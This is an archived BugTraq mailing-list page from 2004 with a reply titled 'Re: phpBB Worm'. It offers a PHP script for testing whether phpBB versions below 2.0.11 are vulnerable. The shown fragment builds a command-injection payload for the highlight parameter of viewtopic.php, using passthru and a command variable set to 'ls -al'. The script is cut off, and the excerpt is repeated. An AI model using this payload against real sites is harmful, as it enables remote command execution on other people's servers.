BugTraq
Back to list
Name:
Email:
*Note: Email address will appear as "user domain ext" to prevent harvesting.
Subject:
Message:
Re: phpBB Worm
Dec 22 2004 11:34PM
William Geoghegan (w geoghegan geotekcs co uk)
A script to check if your phpBB is vulnerable.
Anything below 2.0.11 _probably_ is but incase your not sure, use this
script.
The script generates the request parameters, all you need to do is copy the
result onto www.thesite.com/viewtopic.php
<?
$rush='ls -al'; //do what
$highlight='passthru($...
[ more ]
Privacy Statement
Copyright 2010, SecurityFocus
Anything below 2.0.11 _probably_ is but incase your not sure, use this
script.
The script generates the request parameters, all you need to do is copy the
result onto www.thesite.com/viewtopic.php
<?
$rush='ls -al'; //do what
$highlight='passthru($...
[ more ]